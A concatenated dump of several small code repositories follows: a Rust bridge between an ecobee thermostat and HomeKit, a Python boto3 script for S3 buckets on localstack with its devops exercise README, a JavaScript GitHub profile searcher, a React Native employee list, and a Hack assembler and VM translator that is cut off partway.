serde_urlencoded = "0.5.1"
tokio = "0.1"
toml = "0.4"
<file_sep>/src/ecobee.rs
use std::collections::HashMap;
use std::time::Duration;
use actix::{Actor, Arbiter, AsyncContext, Context, Handler, Message};
use failure::{err_msg, Error};
use futures::{Future, IntoFuture, Stream};
use http::request::Builder;
use http::Request;
use hyper::client::HttpConnector;
use hyper::{Body, Client, Uri};
use hyper_tls::HttpsConnector;
use serde::de::DeserializeOwned;
use serde_json;
use serde_json::Value;
use serde_urlencoded;
use config::Config;
use query::EcobeeQuery;
use response::{EcobeeResponse, EcobeeStatus};
use Result;
trait FutureExt<I, E, F: Future<Item = I, Error = E>> {
fn boxify(self) -> Box<F>;
}
impl<I, E, F> FutureExt<I, E, F> for F
where
F: Future<Item = I, Error = E> + 'static,
{
fn boxify(self) -> Box<F> {
Box::new(self)
}
}
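// Fahrenheit <-> Celsius helpers; ftoc rounds the result to 0.1 degree C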
fn ftoc(f: f32) -> f32 {
((f - 32.0) / 1.8 * 10.0).round() / 10.0
}
fn ctof(c: f32) -> f32 {
(c * 1.8) + 32.0
}
#[derive(Deserialize, Clone, Debug)]
struct AuthToken {
access_token: String,
refresh_token: String,
}
#[derive(Deserialize, Debug)]
struct ErrorMessage {
error: String,
error_description: String,
}
#[derive(Deserialize, Debug)]
#[serde(rename_all = "camelCase")]
struct ThermostatRuntime {
#[serde(rename = "actualTemperature")]
temperature: usize,
#[serde(rename = "actualHumidity")]
humidity: usize,
desired_heat: usize,
desired_cool: usize,
desired_humidity: usize,
}
#[derive(Deserialize, Debug)]
#[serde(rename_all = "camelCase")]
struct ThermostatSettings {
hvac_mode: String,
}
#[derive(Deserialize, Debug)]
struct Thermostat {
identifier: String,
runtime: ThermostatRuntime,
settings: ThermostatSettings,
#[serde(flatten)]
other: HashMap<String, Value>,
}
#[derive(Deserialize, Debug)]
struct ThermostatResponse {
#[serde(rename = "thermostatList")]
thermostats: Vec<Thermostat>,
}
#[derive(Deserialize, Debug)]
struct UpdateResponse {
#[serde(flatten)]
other: HashMap<String, Value>,
}
#[derive(Debug, Fail)]
enum ErrorKind {
#[fail(display = "remote error: {:?}", _0)]
RemoteError(ErrorMessage),
}
pub struct EcobeeActor {
client_id: String,
client: Client<HttpsConnector<HttpConnector>, Body>,
username: String,
password: String,
auth_token: Option<AuthToken>,
thermostats: Vec<Thermostat>,
}
impl EcobeeActor {
const API_BASE: &'static str = "https://api.ecobee.com";
fn build_client() -> Result<Client<HttpsConnector<HttpConnector>>> {
let https = HttpsConnector::new(4)?;
Ok(Client::builder().build::<_, Body>(https))
}
fn build_url(path: &str, payload: Vec<(&str, String)>) -> Result<Uri> {
let url = if payload.is_empty() {
format!("{}{}", Self::API_BASE, path)
} else {
let query: String = serde_urlencoded::to_string(&payload).map_err(Error::from)?;
format!("{}{}?{}", Self::API_BASE, path, query)
};
url.parse().map_err(From::from)
}
pub fn from_config(config: &Config) -> Result<Self> {
Ok(Self {
client_id: config.client_id.clone(),
client: Self::build_client()?,
username: config.username.clone(),
password: config.password.clone(),
auth_token: None,
thermostats: Vec::new(),
})
}
fn send_request<R: DeserializeOwned + Send + 'static>(
&self,
request: Request<Body>,
) -> Box<Future<Item = R, Error = Error> + Send> {
self.client
.request(request)
.and_then(|resp| resp.into_body().concat2())
.map(|chunk| chunk.to_vec())
.map_err(|e| -> Error { e.into() })
.and_then(|data| {
serde_json::from_slice(&data[..]).map_err(move |e| {
let error_message = serde_json::from_slice::<ErrorMessage>(&data[..]);
match error_message {
Ok(message) => ErrorKind::RemoteError(message).into(),
Err(_) => e.into(),
}
})
})
.boxify()
}
fn auth(
&self,
username: String,
password: String,
) -> impl Future<Item = AuthToken, Error = Error> {
let payload = [
("client_id", self.client_id.clone()),
("username", username),
("password", <PASSWORD>),
("scope", "smartWrite".into()),
("response_type", "ecobeeAuthz".into()),
];
let body = serde_json::to_string(&payload).expect("serialized json");
let req = Self::build_url("/authorize", payload.to_vec()).and_then(|url| {
self.default_request(false).and_then(|mut req| {
req.method("POST")
.uri(url)
.body(body.into())
.map_err(|e| e.into())
})
});
match req {
Ok(req) => self.send_request(req),
Err(err) => Err(err_msg(format!("failed to build the request: {:?}", err)))
.into_future()
.boxify(),
}
}
fn refresh_token(&self, refresh: String) -> impl Future<Item = AuthToken, Error = Error> {
let payload = [
("client_id", self.client_id.clone()),
("refresh_token", refresh),
("grant_type", "refresh_token".into()),
];
let req = Self::build_url("/token", payload.to_vec()).and_then(|url| {
self.default_request(false).and_then(|mut req| {
req.method("POST")
.uri(url)
.body(Body::empty())
.map_err(|e| e.into())
})
});
match req {
Ok(req) => self.send_request(req),
Err(err) => Err(err_msg(format!("failed to build the request: {:?}", err)))
.into_future()
.boxify(),
}
}
fn get_thermostat(&self) -> impl Future<Item = ThermostatResponse, Error = Error> {
let payload = [
("json", r#"{"selection":{"includeOemCfg":"true","includeAlerts":"true","includeVersion":"true","includeLocation":"true","selectionType":"registered","includeEvents":"true","includeHouseDetails":"true","includeRuntime":"true","includeNotificationSettings":"true","includeProgram":"true","includeWeather":"true","includePrivacy":"true","includeSecuritySettings":"true","includeSettings":"true","includeExtendedRuntime":"true","includeSensors":"true","includeTechnician":"true"}}"#.into())
];
let req = Self::build_url("/1/thermostat", payload.to_vec()).and_then(|url| {
self.default_request(true).and_then(|mut req| {
req.method("GET")
.uri(url)
.body(Body::empty())
.map_err(|e| e.into())
})
});
match req {
Ok(req) => self.send_request(req),
Err(err) => Err(err_msg(format!("failed to build the request: {:?}", err)))
.into_future()
.boxify(),
}
}
fn set_hvac_mode(
&self,
identifier: String,
mode: u8,
) -> Box<Future<Item = UpdateResponse, Error = Error> + Send> {
let mode = match mode {
1 => "heat",
2 => "cool",
3 => "auto",
_ => "off",
};
let payload = json!({
"selection": {
"selectionType": "thermostats",
"selectionMatch": identifier,
},
"thermostat": [{
"settings": {
"hvacMode": mode
}
}]
});
let req =
Self::build_url("/1/thermostat?format=json&format=json", Vec::new()).and_then(|url| {
self.default_request(true).and_then(|mut req| {
req.method("POST")
.uri(url)
.body(payload.to_string().into())
.map_err(|e| e.into())
})
});
match req {
Ok(req) => Box::new(self.send_request(req)),
Err(err) => Err(err_msg(format!("failed to build the request: {:?}", err)))
.into_future()
.boxify(),
}
}
fn set_temperature(
&self,
identifier: String,
heat: u16,
cool: u16, /* 770 */
) -> impl Future<Item = UpdateResponse, Error = Error> {
let payload = json!({
"selection": {
"selectionType": "thermostats",
"selectionMatch": identifier,
},
"functions": [{
"type": "setHold",
"params": {
"heatHoldTemp": heat,
"coolHoldTemp": cool,
"holdType": "indefinite"
}
}]
});
println!("payload: {:?}", payload);
let req =
Self::build_url("/1/thermostat?format=json&format=json", Vec::new()).and_then(|url| {
self.default_request(true).and_then(|mut req| {
req.method("POST")
.uri(url)
.body(payload.to_string().into())
.map_err(|e| e.into())
})
});
match req {
Ok(req) => self.send_request(req),
Err(err) => Err(err_msg(format!("failed to build the request: {:?}", err)))
.into_future()
.boxify(),
}
}
fn default_request(&self, auth: bool) -> Result<Builder> {
let mut builder = Request::builder();
builder
.header(
"User-Agent",
"Home Comfort/1.3.0 (iPhone; iOS 11.4; Scale/2.00)",
)
.header("X-ECOBEE-APP", "ecobee-ios");
if auth {
let token = self
.auth_token
.clone()
.ok_or_else(|| err_msg("auth token is not set yet"))?;
let value = format!("Bearer {}", token.access_token);
builder.header("Authorization", &value[..]);
}
Ok(builder)
}
}
impl Actor for EcobeeActor {
type Context = Context<Self>;
fn started(&mut self, ctx: &mut Self::Context) {
let username = self.username.clone();
let password = self.password.clone();
let addr = ctx.address();
let auth = self
.auth(username, password)
.and_then(move |token| {
addr.try_send(SetAuthToken(token))
.map_err(|_| err_msg("send error"))
})
.map_err(|err| {
println!("{}", err);
});
Arbiter::spawn(auth);
ctx.run_interval(Duration::from_secs(60 * 60 * 24), |actor, context| {
if let Some(token) = actor.auth_token.clone() {
let addr = context.address();
println!("refreshing token...");
let refresh = actor
.refresh_token(token.refresh_token)
.map(move |token| {
if let Err(_) = addr.try_send(SetAuthToken(token)) {
eprintln!("send failed.");
}
})
.map_err(|e| {
eprintln!("error occurred when refreshing token: {:?}", e);
});
Arbiter::spawn(refresh);
}
});
ctx.run_interval(Duration::from_secs(30), |actor, context| {
let addr = context.address();
let fut = actor
.get_thermostat()
.map(move |thermostat| {
if let Err(_) = addr.try_send(UpdateThermostat(thermostat)) {
eprintln!("send failed.");
}
})
.map_err(|e| {
eprintln!("error occurred when fetching thermostat: {:?}", e);
});
Arbiter::spawn(fut);
});
}
}
impl Handler<EcobeeQuery> for EcobeeActor {
type Result = Result<EcobeeResponse>;
fn handle(&mut self, _query: EcobeeQuery, _ctx: &mut Self::Context) -> Self::Result {
if let Some(thermostat) = self.thermostats.first() {
let mode: u8 = match &thermostat.settings.hvac_mode[..] {
"auto" => 3,
"cool" => 2,
"heat" => 1,
_ => 0,
};
let runtime = &thermostat.runtime;
let target: f32 = {
let heat = runtime.desired_heat as f32;
let cool = runtime.desired_cool as f32;
(heat + cool) / 20.0
};
let current: f32 = (runtime.temperature as f32) / 10.0;
let humidity: f32 = runtime.humidity as f32;
let target_humidity: f32 = runtime.desired_humidity as f32;
Ok(EcobeeResponse::Status(EcobeeStatus::new(
mode,
ftoc(target),
ftoc(current).round(),
humidity,
target_humidity / 100.0,
)))
} else {
Err(err_msg("no thermostat available"))
}
}
}
#[derive(Message)]
struct UpdateThermostat(ThermostatResponse);
impl Handler<UpdateThermostat> for EcobeeActor {
type Result = ();
fn handle(&mut self, update: UpdateThermostat, _: &mut Self::Context) -> Self::Result {
self.thermostats = update.0.thermostats;
}
}
#[derive(Message)]
struct SetAuthToken(AuthToken);
impl Handler<SetAuthToken> for EcobeeActor {
type Result = ();
fn handle(&mut self, request: SetAuthToken, _: &mut Self::Context) -> Self::Result {
println!("setting token to: {:?}", request.0);
self.auth_token = Some(request.0.clone());
}
}
pub enum ChangeThermostat {
HvacMode(u8),
Temperature(f32),
}
impl Message for ChangeThermostat {
type Result = Result<Box<Future<Item = (), Error = Error> + Send + 'static>>;
}
impl Handler<ChangeThermostat> for EcobeeActor {
type Result = Result<Box<Future<Item = (), Error = Error> + Send + 'static>>;
fn handle(&mut self, request: ChangeThermostat, _: &mut Self::Context) -> Self::Result {
if let Some(thermostat) = self.thermostats.first() {
match request {
ChangeThermostat::HvacMode(mode) => Ok(self
.set_hvac_mode(thermostat.identifier.clone(), mode)
.map(|_| ())
.boxify()),
ChangeThermostat::Temperature(temperature) => {
let temperature = (ctof(temperature) * 10.0) as u16;
let heat = temperature - 36;
let cool = temperature + 36;
Ok(self
.set_temperature(thermostat.identifier.clone(), heat, cool)
.map(|_| ())
.boxify())
}
}
} else {
Err(err_msg("no thermostat available"))
}
}
}
<file_sep>/src/main.rs
extern crate actix;
#[macro_use]
extern crate actix_derive;
extern crate actix_web;
extern crate clap;
#[macro_use]
extern crate failure;
extern crate futures;
extern crate http;
extern crate hyper;
extern crate hyper_tls;
extern crate serde;
#[macro_use]
extern crate serde_derive;
#[macro_use]
extern crate serde_json;
extern crate serde_urlencoded;
extern crate tokio;
extern crate toml;
mod config;
mod ecobee;
mod query;
mod response;
mod server;
use std::fs::File;
use std::io::Read;
use actix::Actor;
use clap::{App, Arg};
use failure::{err_msg, Error};
use ecobee::EcobeeActor;
const VERSION: &'static str = "0.0.1";
pub type Result<R> = std::result::Result<R, Error>;
fn build_clap<'a, 'b>() -> App<'a, 'b> {
clap::App::new("castform")
.version(VERSION)
.about("ecobee bridge to homekit")
.arg(
Arg::with_name("config")
.short("c")
.long("config")
.value_name("CONFIG_FILE")
.default_value("config.toml")
.help("path to config file"),
)
.arg(
Arg::with_name("host")
.short("H")
.long("host")
.value_name("HOST")
.default_value("127.0.0.1")
.help("HTTP host to listen to"),
)
.arg(
Arg::with_name("port")
.short("p")
.long("port")
.value_name("PORT")
.default_value("8351")
.help("HTTP port to listen to"),
)
}
fn main() -> Result<()> {
let system = actix::System::new("castform");
let matches = build_clap().get_matches();
let config = matches
.value_of("config")
.ok_or_else(|| err_msg("must provide config"))?;
let mut config = File::open(config)?;
let mut contents = String::new();
config.read_to_string(&mut contents)?;
let config = toml::from_str(&contents)?;
let ecobee =
EcobeeActor::from_config(&config).map(|actor| EcobeeActor::create(move |_| actor))?;
let server = actix_web::server::new(move || server::build_server_factory(ecobee.clone()));
let host = matches.value_of("host").unwrap();
let port = matches.value_of("port").unwrap();
let addr = format!("{}:{}", host, port);
let server = server.bind(addr.clone())?;
server.start();
println!("Starting HTTP server: http://{}", addr);
let _ = system.run();
Ok(())
}
<file_sep>/src/server.rs
use actix::Addr;
use actix_web::http::StatusCode;
use actix_web::server::{HttpHandler, HttpHandlerTask};
use actix_web::{http, middleware, App, Error, Form, HttpResponse, Json, State};
use failure::err_msg;
use futures::Future;
use ecobee::{ChangeThermostat, EcobeeActor};
use query::EcobeeQuery;
use response::{EcobeeResponse, EcobeeStatus};
#[derive(Clone)]
struct HttpServerState {
ecobee: Addr<EcobeeActor>,
}
#[derive(Deserialize)]
struct TemperatureForm {
temperature: f32,
}
#[derive(Deserialize)]
struct ModeForm {
state: u8,
}
fn status(state: State<HttpServerState>) -> impl Future<Item = Json<EcobeeStatus>, Error = Error> {
state
.ecobee
.send(EcobeeQuery::Status)
.map_err(|_| err_msg("mailbox error"))
.flatten()
.map(|resp: EcobeeResponse| match resp {
EcobeeResponse::Status(status) => Json(status),
})
.from_err()
}
fn set_heating_cooling_state(
(state, mode): (State<HttpServerState>, Form<ModeForm>),
) -> impl Future<Item = HttpResponse, Error = Error> {
state
.ecobee
.send(ChangeThermostat::HvacMode(mode.state))
.map_err(|_| err_msg("mailbox error"))
.flatten()
.flatten()
.map(|_: ()| {
HttpResponse::build(StatusCode::OK)
.content_type("text/html; charset=utf-8")
.body("done")
})
.map_err(|e| {
eprintln!("error: {:?}", e);
e
})
.from_err()
}
fn set_target_temperature(
(state, form): (State<HttpServerState>, Form<TemperatureForm>),
) -> impl Future<Item = HttpResponse, Error = Error> {
state
.ecobee
.send(ChangeThermostat::Temperature(form.temperature))
.map_err(|_| err_msg("mailbox error"))
.flatten()
.flatten()
.map(|_: ()| {
HttpResponse::build(StatusCode::OK)
.content_type("text/html; charset=utf-8")
.body("done")
})
.map_err(|e| {
eprintln!("error: {:?}", e);
e
})
.from_err()
}
pub fn build_server_factory(
ecobee: Addr<EcobeeActor>,
) -> impl IntoIterator<Item = Box<HttpHandler<Task = Box<HttpHandlerTask + 'static>> + 'static>> + 'static
{
let state = HttpServerState { ecobee };
vec![
App::with_state(state)
.middleware(middleware::Logger::default())
.resource("/status", |r| {
r.method(http::Method::GET).with_async(status)
})
.resource("/targetHeatingCoolingState", |r| {
r.method(http::Method::POST)
.with_async(set_heating_cooling_state)
})
.resource("/targetTemperature", |r| {
r.method(http::Method::POST)
.with_async(set_target_temperature)
})
.boxed(),
]
}
<file_sep>/src/query.rs
use actix::Message;
use response::EcobeeResponse;
use Result;
pub enum EcobeeQuery {
Status,
}
impl Message for EcobeeQuery {
type Result = Result<EcobeeResponse>;
}
<file_sep>/src/config.rs
#[derive(Deserialize)]
pub struct Config {
pub client_id: String,
pub username: String,
pub password: String,
}
<file_sep>/src/response.rs
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct EcobeeStatus {
target_heating_cooling_state: u8,
target_temperature: f32,
target_relative_humidity: f32,
current_heating_cooling_state: u8,
current_temperature: f32,
current_relative_humidity: f32,
}
impl EcobeeStatus {
pub fn new(
mode: u8,
target: f32,
current: f32,
humidity: f32,
target_humidity: f32,
) -> EcobeeStatus {
EcobeeStatus {
target_heating_cooling_state: mode,
target_temperature: target,
target_relative_humidity: target_humidity,
current_heating_cooling_state: mode,
current_temperature: current,
current_relative_humidity: humidity,
}
}
}
pub enum EcobeeResponse {
Status(EcobeeStatus),
}
| 5f2920903934b603a041bd63a0b496e0763c5cb2 | ["TOML", "Rust"] | 7 | TOML | fanzeyi/castform | e367208c574b8cd50a1a6a12133be68b469710bf | d7f23dceb0a5a27bc6c3d415d566e4ba1b50572b | refs/heads/master |
<file_sep># Qoala Devops Test Case 1
# Before you begin (Python >= 3.8)
## pipenv
### Install pipenv
If `pipenv` is not yet installed, install it with `brew install pipenv` or `pip install pipenv`.
To bootstrap the project after pipenv is installed, run `pipenv install`. To activate the python virtual environment, use `pipenv shell`.
### Activate python shell with pipenv
This project uses `pipenv` to manage the python environment, and it should be initialized with `Python>=3.8` by running:
`pipenv --python 3.8`
## pre-commit hook
This project also uses a `pre-commit` hook to autoformat with `black` and lint with `flake8`. To initialize `pre-commit`, install it with `brew install pre-commit` or `pip install pre-commit`, and then run `pre-commit install`.
### Formatter
Uses `black`
### Linter
Uses `flake8`
### Mypy
This project uses mypy to add type hints and type checks to the codebase, which helps keep it maintainable.
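For example, a small helper type-checked by mypy against the `boto3-stubs` types could look like this (a minimal sketch; `bucket_exists` is a hypothetical helper, not part of this project):
```python
from mypy_boto3 import s3


def bucket_exists(client: s3.S3Client, name: str) -> bool:
    # mypy verifies that list_buckets() exists on S3Client and that the
    # response dict is indexed with valid keys.
    response = client.list_buckets()
    return any(bucket["Name"] == name for bucket in response["Buckets"])
```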
### Vscode
There is a `.vscode` folder containing the standard settings for this project, which configure the formatter and linter.
The default settings are:
```json
{
"editor.formatOnSave": true,
"python.linting.flake8Enabled": true,
"python.linting.enabled": true,
"python.formatting.provider": "black",
"python.linting.mypyEnabled": true
}
```
# Instructions:
## Create deployable app with docker & docker-compose
The project consists of boto3, mypy, and black formatter bootstrapping, plus a main file `create_s3_bucket.py`.
- Create a Dockerfile for the project that will run the file `create_s3_bucket.py`
- Run a localstack
- Create a `docker-compose.yml` file that will set up [localstack](https://github.com/localstack/localstack) as well as run the dockerized project
- The expectation for this finished project is that running `docker-compose up` will run the `create_s3_bucket.py` python file and produce the following logs:
- Success run log:
```
list buckets created: ['test1', 'test2']
list buckets after delete: []
```
- Failed run log:
```
Error: Could not connect to the endpoint URL: "http://localhost:4572/test1"
```
or any other errors not matching the success run log
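A common cause of the failed run log above: inside a docker-compose network, `localhost` refers to the app container itself, so the client generally has to target the localstack service by its service name instead. A minimal sketch, assuming the compose service is named `localstack` and the endpoint is passed through a hypothetical `S3_ENDPOINT_URL` environment variable:
```python
import os

import boto3

# Assumption: docker-compose.yml sets S3_ENDPOINT_URL=http://localstack:4572
# for the app container; local runs fall back to localhost.
endpoint = os.environ.get("S3_ENDPOINT_URL", "http://localhost:4572")

session = boto3.session.Session()
s3_client = session.client(
    service_name="s3",
    aws_access_key_id="123",
    aws_secret_access_key="123",
    endpoint_url=endpoint,
)
```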
Please fork this repository and share the link to your repository with us when you're done.
You can extend any of the scripts to introduce some features such as creating an API out of this.
<file_sep>[[source]]
name = "pypi"
url = "https://pypi.org/simple"
verify_ssl = true
[dev-packages]
flake8 = "*"
black = "*"
pre-commit = "*"
mypy = "*"
boto3 = "*"
boto3-stubs = {extras = ["essential", "ecs", "elbv2"],version = "*"}
mypy_boto3 = "*"
[packages]
click = "*"
pyyaml = "*"
boto3 = "*"
[requires]
python_version = "3.8"
[pipenv]
allow_prereleases = true
<file_sep>.PHONY: clean lint
lint:
flake8 *.py<file_sep>import boto3
from mypy_boto3 import s3
try:
session = boto3.session.Session()
s3_client: s3.S3Client = session.client(
service_name="s3",
aws_access_key_id="123",
aws_secret_access_key="123",
endpoint_url="http://localhost:4572",
)
bucket_test1 = s3_client.create_bucket(Bucket="test1")
bucket_test2 = s3_client.create_bucket(Bucket="test2")
response = s3_client.list_buckets()
buckets = [bucket["Name"] for bucket in response["Buckets"]]
print(f"list buckets created: {buckets}")
if ["test1", "test2"] in buckets:
raise Exception("Test bucket not created")
s3_client.delete_bucket(Bucket="test1")
s3_client.delete_bucket(Bucket="test2")
response = s3_client.list_buckets()
buckets = [bucket["Name"] for bucket in response["Buckets"]]
print(f"list buckets after delete: {buckets}")
except Exception as e:
print(f"Error: {e}")
|
cb5e2eabc1f43ae62bec208d0880b0b988fabb42
|
[
"Markdown",
"TOML",
"Python",
"Makefile"
] | 4
|
Markdown
|
qoala-engineering/devops-test-case-1
|
90a86f1e39b2eaaecd11fd1954d56337682f0ace
|
6550551c597c5aefc18f319eaa27d4284495ba7c
|
refs/heads/master
|
<repo_name>TheCoderDream/Native-JS-Github-Profile-Searcher<file_sep>/app.js
const githubApiService = new GithubAPI();
const ui = new UI();
let toasterIsActive = true;
const searchUser = document.getElementById('searchUser');
document.addEventListener('DOMContentLoaded', () => {
searchUser.value = '';
});
searchUser.addEventListener('keyup', (e) => {
const userText = e.target.value;
if(userText) {
githubApiService.getUser(userText)
.then(data => {
if (data.profile.message && toasterIsActive) {
toasterIsActive = false;
ui.clearProfile();
Toaster('#toaster', 'User Not Found', 'danger', 3)
.then((isTrue) => {
toasterIsActive = isTrue;
});
} else if(!data.profile.message) {
console.log(data);
ui.showProfile(data.profile);
ui.showRepos(data.repos);
}
})
.catch(err => {
console.log(err);
})
} else {
ui.clearProfile();
}
});<file_sep>/githubAPIService.js
class GithubAPI {
constructor() {
this.client_id = '58106d38d809be3352a6';
this.client_secret = '<KEY>';
this.repos_count = 5;
this.repos_sort = 'created: asc'
}
async getUser(username) {
        // Build each URL on one line: a template literal split across lines
        // would embed the newlines and indentation in the request URL.
        const profileResponse = await fetch(
            `https://api.github.com/users/${username}?client_id=${this.client_id}&client_secret=${this.client_secret}`
        );
        const repoResponse = await fetch(
            `https://api.github.com/users/${username}/repos?per_page=${this.repos_count}&client_id=${this.client_id}&sort=${this.repos_sort}&client_secret=${this.client_secret}`
        );
const profile = await profileResponse.json();
const repos = await repoResponse.json();
return {
profile,
repos
}
}
}<file_sep>/README.md
# Native-JS-Github-Profile-Searcher

| 049f82ccb7579c90e970d8e193735c6d2309ea4f | ["JavaScript", "Markdown"] | 3 | JavaScript | TheCoderDream/Native-JS-Github-Profile-Searcher | bb9c8edef7dc05e6b4ce207cf4f3f3775ff2dbe7 | 7f425c680b5f1e48e131a77966f991cd44eefb18 | refs/heads/master |
<file_sep>import React, {Component} from 'react';
import {
StyleSheet,
Text,
View,
ScrollView,
TextInput,
TouchableOpacity,
Alert,
Image,
} from 'react-native';
import {getUser} from './../module/login/store/action';
import {connect} from 'react-redux';
import EmpImage from './../common/image/emp2.jpg';
// import { Avatar } from 'react-native-elements';
class EmployeeScreen extends Component {
constructor(props) {
super(props);
this.state = {
useData: [],
};
}
componentDidMount() {
this.props.getUser().then((response) => {
this.setState({
useData: response,
});
});
}
render() {
    let itemList = this.state.useData.map((data, index) => {
      return (
        <View
          key={index} // each element rendered from map() needs a stable key
          style={{
justifyContent: 'center',
paddingTop: 13,
backgroundColor: '#ffff',
}}>
<View
style={{
height: 108,
flexDirection: 'row',
elevation: 4,
shadowOffset: {width: 5, height: 5},
shadowColor: 'red',
shadowOpacity: 0.5,
shadowRadius: 10,
backgroundColor: '#ede8e8',
marginBottom: 10,
marginHorizontal: 15,
paddingTop: 7,
}}>
          <View style={{borderRadius: 20, justifyContent: 'center'}}>
<Image
source={EmpImage}
style={{
width: 70,
height: 90,
marginLeft: 10,
resizeMode: 'stretch',
}}></Image>
</View>
<View>
<Text style={styles.text}>Name : {data.name}</Text>
<Text style={styles.text}>Age : {data.age}</Text>
<Text style={styles.text}>Gender : {data.gender}</Text>
<Text style={styles.text}>Email : {data.email}</Text>
<Text style={styles.text}>PhoneNo : {data.phoneNo}</Text>
</View>
</View>
</View>
);
});
return <ScrollView>{itemList}</ScrollView>;
}
}
const mapStateToProps = (state) => {
const {login} = state;
return {
login,
};
};
const mapDispatchToProps = {
  getUser,
};
export default connect(mapStateToProps, mapDispatchToProps)(EmployeeScreen);
const styles = StyleSheet.create({
text: {
fontFamily: 'serif',
alignItems: 'center',
marginLeft: 10,
fontSize: 13,
fontWeight: 'bold',
},
});
<file_sep>import axios from 'axios';
import * as actionType from './action-type';
const setLogin = (payload) => ({
type: actionType.SET_LOGIN,
payload,
});
export const getLogin = () => (dispatch) =>
new Promise((resolve) => {
try {
axios
.get('http://192.168.0.105:3000/login')
.then((response) => {
console.log('res', response);
//alert(response)
dispatch(setLogin(response.data));
resolve(response.data);
})
.catch((err) => {
console.log('err', err);
});
} catch {
alert('error');
}
});
const setUser = (payload) => ({
type: actionType.LIST_USER,
payload,
});
export const getUser = () => (dispatch) =>
new Promise((resolve) => {
try {
axios
.get('http://192.168.0.105:3000/empuser')
.then((response) => {
console.log('res', response);
//alert(response)
dispatch(setUser(response.data));
resolve(response.data);
})
.catch((err) => {
console.log('err', err);
});
} catch {
alert('error');
}
});
<file_sep>export const LIST_USER = '@user/list'
export const SET_LOGIN='@user/login'
| e4910fcda1144cff88f68cd8f09a598def6788d0 | ["JavaScript"] | 3 | JavaScript | Navyasiddi/DemoLogin | 35178ae97d9801ec3d40ccb8e0515de260ec768a | 0b9bf7d5049a679f90a979bdf62d2dd74c6b5ead | refs/heads/master |
<file_sep>import re
class Assembler(object):
def __init__(self,stringStream):
self.lines = stringStream.split()
self.output=""
self.symTable={
"SP":0,
"LCL":1,
"ARG":2,
"THIS":3,
"THAT":4,
"SCREEN":16384,
"KBD":24576
}
lineNumber=0
print("Building symbol table....")
for line in self.lines:
if line[0]=="(":
self.symTable[line[1:-1]]=lineNumber
else:
lineNumber+=1
print("Done building symbol table, building variable table...")
varIndex=16
for line in self.lines:
if line[0]=="@":
try:
if(line[1]!="R"):
int(line[1:])
else:
int(line[2:])
except:
if not line[1:] in self.symTable:
self.symTable[line[1:]]=varIndex
varIndex+=1
print("Done building variable table, assmebling.")
for line in self.lines:
if line[0]!="(":
self.output+=self.convertLine(line,lineNumber)
self.output+="\n"
if(len(self.output)!=0 and self.output[-1]=="\n"):
self.output=self.output[:-1]
def convertLine(self,line,lineNumber):
cBits = {
"0":"101010",
"1":"111111",
"0" : "101010",
"1" : "111111",
"-1" : "111010",
"D" : "001100",
"A" : "110000",
"!D" : "001101",
"!A" : "110001",
"-D" : "001111",
"-A" : "110011",
"D+1" : "011111",
"1+D" : "011111",
"A+1" : "110111",
"1+A" : "110111",
"D-1" : "001110",
"A-1" : "110010",
"D+A" : "000010",
"A+D" : "000010",
"D-A" : "010011",
"A-D" : "000111",
"D&A" : "000000",
"A&D" : "000000",
"D|A" : "010101",
"A|D" : "010101"
}
dBits = {
"M" : "001",
"D" : "010",
"MD" : "011",
"A" : "100",
"AM" : "101",
"AD" : "110",
"AMD" : "111",
}
jBits = {
"JGT" : "001",
"JEQ" : "010",
"JGE" : "011",
"JLT" : "100",
"JNE" : "101",
"JLE" : "110",
"JMP" : "111"
}
binaryLine=""
if line[0]=="@":
try:
aOut=bin(int(line[1:]))[2:]
except:
try:
aOut=bin(int(line[2:]))[2:]
except:
try:
aOut=bin(self.symTable[line[1:]])[2:]
except:
print(line[1:] + " **** threw error")
exit()
binaryLine+=aOut
while(len(binaryLine)<16):
binaryLine="0"+binaryLine
else:
binaryLine+="111"
lineArray=line.split("=")
opType="setOp"
aBit="1" if len(lineArray)==2 and re.search("M",lineArray[1]) else "0"
if(aBit=="1"):
lineArray[1]=lineArray[1].replace("M","A")
if(len(lineArray)==1):
lineArray=lineArray[0].split(";")
opType="jumpOp"
try:
cBit=cBits[lineArray[1 if opType=="setOp" else 0]]
except:
cBit="000000"
try:
dBit=dBits[lineArray[0 if opType=="setOp" else 1]]
except:
dBit="000"
try:
jBit=jBits[lineArray[1]]
except:
jBit="000"
binaryLine+=aBit+cBit+dBit+jBit
return binaryLine<file_sep># Name: <NAME>
# Course: CS410
# Assignment: PY02
# Due Date: 2/13/13
from Parser import Parser
from Assembler import Assembler
from CodeWriter import CodeWriter
import sys
if len(sys.argv)<3 or 4<len(sys.argv):
sys.exit("Usage: jacklex.py <input file> <output file> [-a]")
try:
fi=open(sys.argv[1], "r")
except:
sys.exit("Could not find input file!")
try:
fo=open(sys.argv[2], "w+")
except:
sys.exit("Could not open/create output file!")
if len(sys.argv)==3:
parseFile = Parser(fi.read(),False)
printmsg="Wrote output file to "+sys.argv[2]
outString=parseFile.output
parseFile.stats()
elif len(sys.argv)==4 and sys.argv[3]=="-a":
parseFile = Parser(fi.read(),False)
print("Done stripping comments, moving on to assembly steps.")
printmsg="Wrote assembled file to "+sys.argv[2]
assemFile=Assembler(parseFile.output)
outString=assemFile.output
elif len(sys.argv)==4 and sys.argv[3]=="-v":
parseFile = Parser(fi.read(),True)
print("Done stripping comments, moving on to interpreting steps.")
printmsg="Wrote interpreted file to "+sys.argv[2]
codeFile = CodeWriter(parseFile.output,sys.argv[1])
outString=codeFile.output
elif len(sys.argv)==4 and sys.argv[3]=="-va":
parseFile = Parser(fi.read(),True)
print("Done stripping comments, moving on to interpreting steps.")
codeFile=CodeWriter(parseFile.output,sys.argv[1])
parseFile=Parser(codeFile.output,False)
parsedCode=parseFile.output
print("Moving on to assembly steps.")
assemFile=Assembler(parsedCode)
printmsg="Wrote assembled and interpreted file to "+sys.argv[2]
outString=assemFile.output
else:
printmsg="Invalid parameters given."+"\n"+"Usage: jacklex.py <input file> <output file> [-a, -v]"
fo.write(outString)
fo.close()
sys.exit(printmsg)<file_sep>import sys
from string import Template
class CodeWriter(object):
def __init__(self,stringStream,fileName):
self.fileName=fileName.split(".")[0]
self.staticIndex=0
self.lines=stringStream.split("\n")
self.lines=[line.strip().lower() for line in self.lines]
self.output=""
self.genOutput()
def genOutput(self):
opCount=0
for line in self.lines:
lineArray=line.split(" ")
lineLower = lineArray[0].lower()
            if lineLower=="push":
self.output+=self.opCodePUSH(lineArray)
elif lineLower=="pop":
self.output+=self.opCodePOP(lineArray)
elif lineLower=="add":
opDict = {'op':"+"}
self.output+=self.runTemplate("binary",opDict)
elif lineLower=="sub":
